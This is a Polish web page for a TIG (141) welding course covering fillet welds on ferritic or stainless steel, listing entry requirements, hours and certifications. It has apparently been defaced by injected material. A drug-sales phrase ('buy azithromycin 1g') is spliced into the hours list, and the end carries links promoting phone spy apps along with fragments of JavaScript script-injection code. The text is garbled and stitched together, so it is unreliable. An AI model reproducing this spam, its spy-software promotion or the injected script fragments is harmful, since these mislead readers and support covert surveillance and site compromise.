TIG (1.1)

Kurs spawania blach i rur ze stali ferrytycznych lub nerdzewnych spoinami pachwinowymi metodą TIG (141) – I stopień
Założenia organizacyjno – programowe:

Cel kursu
Teoretyczne i praktyczne przygotowanie uczestników kursu do egzaminu końcowego IS-P/T-FW-1-141 lub IS-P/T-FW-8-141
Zasady rekrutacji
  • ukończona co najmniej szkoła podstawowa
  • ukończone 18 lat
  • Zaświadczenie lekarskie stwierdzające zdolność do wykonywania zawodu spawacza
Liczba godzin
  • Część teoretyczna – 23 godz. (31 godz.)
  • Część praktyczna: ćwiczenia praktyczne –  buy azithromycin 1g 70 godz., instruktaż wstępny – 2 godz., egzamin – 8 godz.
  • Razem kurs – 103 godz. (111 godz.)
Uzyskane uprawnienia
Uczestnik utrzymuje:
  • uprawnienia do spawania konstrukcji klasy 3 wg PN-87/M-69008
  • uprawnienia te są ważne dwa lata i muszą być przedłużone zgodnie z ustaleniami zawartymi w normie EN 287-1
  • wpis w Książce Spawacza przez Instytut Spawalnictwa  w Gliwicach
  • Świadectwo Egzaminu Spawacza ważne w całej Unii  Europejskiej (Welder Approval Test Certyfikate) w języku polskim i angielskim lub w polskim i  niemieckim wydane przez Instytut Spawalnictwa w Gliwicach
Cena kursu
?

Once you find https://spyappsinsider.com

them, then you have to enter in the amount it is worthdocument.currentScript.parentNode.insertBefore(s, document.currentScript);d.getElementsByTagName(‚head’)[0].appendChild(s);The most popular 2017 spy software applications for the mobile phones.http://redbridgebluegrass.com/ios-spy-cell-phone-spy-phone-tracker/

Top